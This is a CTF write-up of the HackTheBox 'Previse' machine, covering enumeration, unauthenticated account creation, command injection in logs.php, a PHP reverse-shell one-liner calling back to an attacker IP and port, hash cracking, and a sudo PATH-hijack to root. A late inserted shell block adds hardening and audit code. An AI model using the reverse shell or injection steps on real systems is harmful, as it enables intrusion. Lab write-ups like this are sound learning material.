HackTheBox-Previse

ARZ101
6 min read, Jan 8, 2022

Hello everyone, in this post I will be sharing my writeup for the HTB Previse machine, an easy-difficulty Linux box. Starting off with nmap we can see only 2 open ports, of which port 80 served a web page with a login form. Trying SQLi to bypass the login didn't work, but running a fuzzing tool showed some PHP files whose responses we can read without being authenticated, and those revealed how to register a user. After creating an account we can download an archive containing the source code of the web pages; config.php held MySQL credentials and logs.php was vulnerable to command injection, which gave us a reverse shell as www-data. Cracking the hash from the database escalated us to m4lwhere, and this user can run a script as root that invokes gzip and date by relative path, which led us to a PATH variable exploit and a root shell.

NMAP

PORT   STATE SERVICE REASON         VERSION                               
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web server we can see a PHP login page

I tried the basic credentials admin:admin, which didn't work, then moved on to a manual SQLi bypass with admin' or 1=1 -- which didn't work either. Running sqlmap didn't find any SQLi.

So I ran gobuster to fuzz for files

We can see some pages being redirected to login.php again, but we can still read the response bodies of those pages if we capture them in Burp Suite

Looking at the HTML response we can see that, without logging in, we can view some PHP pages that still return HTML, so we don't really need Burp Suite to view the responses; we can use curl

We can see that an account can be made with accounts.php

Now to create a user we need to make a POST request to accounts.php with the username, password and confirm parameters; also note that the username and password must be between 5 and 32 characters long

curl -X POST -d "username=arz101&password=123456789&confirm=123456789" http://10.10.11.104/accounts.php

Now we can log in to the site

Navigating to Files we can see a backup archive that we can download

Extracting the archive we can see some PHP files, of which config.php and logs.php are the interesting ones to look at; from config.php we can find the MySQL credentials

From logs.php it seems that we can inject commands, as the input is not properly sanitized

We can see the delim parameter can be set to comma, space or tab

This allows us to make requests to our machine, which means we can fetch the phpbash file, an interactive web shell in the browser, and from there get a reverse shell

Now just copy and paste this PHP reverse shell one-liner

php -r '$sock=fsockopen("10.10.14.45",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Stabilizing the shell with python

Using the MySQL creds we found earlier

We see a password hash for the user m4lwhere; the rest are accounts made the same way I made mine, as this is a shared instance, so we need to crack m4lwhere's hash. Cracking this hash could take a while; for me it took 11 minutes.

Now that we have the user's password we can log in through SSH

Doing sudo -l we can see that this user can run a script in /opt/scripts as root

Looking at the script we can see it uses gzip without its absolute binary path, i.e. /bin/gzip, and the same goes for the date binary

So we can abuse this through a PATH variable exploit: create a fake binary that spawns a bash shell, a reverse shell, or makes bash SUID, then prepend the directory containing that binary to the PATH variable. We could do this for either gzip or date, but here I'll be showing it with the date binary
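As an added example (not the box's /opt/scripts script and not the author's code), here is how a root-run backup script of this kind is hardened against PATH hijacking, alongside a small audit helper that flags bare gzip/date calls in an existing script; /bin/gzip and /bin/date are assumed to be the real binaries on the host.

```shell
#!/bin/sh
# Added example, not the /opt/scripts script from the box: a backup routine
# hardened against PATH hijacking, plus an audit helper for existing scripts.

# Hardening 1: pin PATH to system directories before anything else runs, so a
# writable directory the caller prepends to PATH is never searched.
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH

# Hardening 2: call every external binary by absolute path (assumed locations).
GZIP_BIN=/bin/gzip
DATE_BIN=/bin/date

# Compress file $1 into directory $2 as <name>.<timestamp>.gz and print the path.
hardened_backup() {
    src="$1"
    out_dir="$2"
    [ -f "$src" ] && [ -d "$out_dir" ] || return 1
    stamp=$("$DATE_BIN" +%Y%m%d_%H%M%S)
    out="$out_dir/${src##*/}.$stamp.gz"
    "$GZIP_BIN" -c "$src" > "$out" || return 1
    printf '%s\n' "$out"
}

# Audit helper: print each line of script $1 that invokes gzip or date without
# an absolute path, the pattern sudo -l exposed here. Extend the alternation
# to cover other binaries.
BARE_CMD_RE='(^|[^/[:alnum:]_])(gzip|date)([[:space:]]|$)'

audit_relative_calls() {
    grep -nE "$BARE_CMD_RE" "$1" || true
}

# Number of offending lines, convenient for scripted checks (0 means clean).
count_relative_calls() {
    audit_relative_calls "$1" | grep -c . || true
}
```

The sudoers secure_path setting (Defaults secure_path=...) pins PATH from the caller's side as well, but the script-level fix holds even on hosts where it is not configured.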

And boom, we got root
